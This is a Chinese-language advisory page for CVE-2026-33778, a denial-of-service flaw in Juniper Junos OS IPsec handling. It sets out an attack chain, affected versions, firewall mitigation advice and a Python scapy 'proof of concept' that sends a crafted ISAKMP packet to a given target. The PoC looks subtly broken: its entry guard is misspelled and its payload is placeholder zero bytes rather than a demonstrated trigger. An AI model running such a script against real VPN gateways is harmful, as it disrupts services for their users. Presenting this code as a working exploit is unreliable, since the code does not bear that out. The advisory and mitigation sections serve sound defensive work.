CVE-2026-33778 CVSS 7.5 高危

CVE-2026-33778 Junos OS IPsec库拒绝服务漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33778

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS (SRX Series, MX Series)

漏洞概述

Juniper Networks Junos OS（SRX和MX系列）的IPsec库存在输入验证不当漏洞。未认证攻击者可通过网络发送特制的畸形ISAKMP数据包，导致kmd/iked进程崩溃重启，造成设备无法建立新的VPN连接，引发拒绝服务。

技术细节

该漏洞源于Junos OS中kmd和iked进程使用的IPsec库未能正确验证输入数据的语法正确性。当受影响设备接收到攻击者发送的特制畸形第一个ISAKMP数据包时，解析逻辑无法处理异常数据，触发kmd/iked进程崩溃并自动重启。由于进程重启期间无法处理新的安全关联（SA）请求，反复利用此漏洞将导致设备完全丧失建立新VPN连接的能力，造成持续性的拒绝服务状态。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络，识别运行受影响Junos OS版本的SRX或MX系列设备，并确认其IPsec服务（UDP 500/4500端口）开放。

STEP 2

漏洞利用

攻击者向目标设备发送特制的畸形ISAKMP数据包。该数据包在语法上构造异常，旨在绕过常规检查并触发解析器错误。

STEP 3

进程崩溃

目标设备的kmd或iked进程在解析该数据包时发生异常，导致进程崩溃并自动重启。

STEP 4

拒绝服务

在进程重启期间，设备无法处理新的安全关联（SA）请求。攻击者持续发送此类数据包，可导致设备长期无法建立新的VPN连接。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-33778
# This script demonstrates sending a malformed ISAKMP packet.

from scapy.all import *
import sys

def send_malformed_isakmp(target_ip):
    # Craft ISAKMP header with specific attributes to trigger the crash
    isakmp_header = ISAKMP()
    isakmp_header.init_cookie = b"\x00" * 8
    isakmp_header.resp_cookie = b"\x00" * 8
    isakmp_header.next_payload = 0
    isakmp_header.exch_type = 5
    isakmp_header.flags = 0
    isakmp_header.msgid = 0
    isakmp_header.length = 28
    
    # Add arbitrary payload to simulate malformed data
    payload = Raw(load=b"\x00" * 100)
    
    packet = IP(dst=target_ip)/UDP(sport=500, dport=500)/isakmp_header/payload
    
    print(f"[*] Sending malformed ISAKMP packet to {target_ip}...")
    send(packet, verbose=0)
    print("[+] Packet sent. Check kmd/iked process status.")

if __name__ == "____main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_ip>")
        sys.exit(1)
    send_malformed_isakmp(sys.argv[1])

影响范围

Junos OS (SRX/MX) < 22.4R3-S9

Junos OS (SRX/MX) 23.2 < 23.2R2-S6

Junos OS (SRX/MX) 23.4 < 23.4R2-S7

Junos OS (SRX/MX) 24.2 < 24.2R2-S4

Junos OS (SRX/MX) 24.4 < 24.4R2-S3

Junos OS (SRX/MX) 25.2 < 25.2R1-S2, 25.2R2

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，请配置防火墙规则，限制不可信IP地址对设备IPsec服务端口（UDP 500和4500）的访问，仅允许受信任的对端IP连接，以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33778
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33778
3 Details https://www.cvedetails.com/cve/CVE-2026-33778/
4 VulDB https://vuldb.com/cve/CVE-2026-33778
5 Link https://kb.juniper.net/JSA107868

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表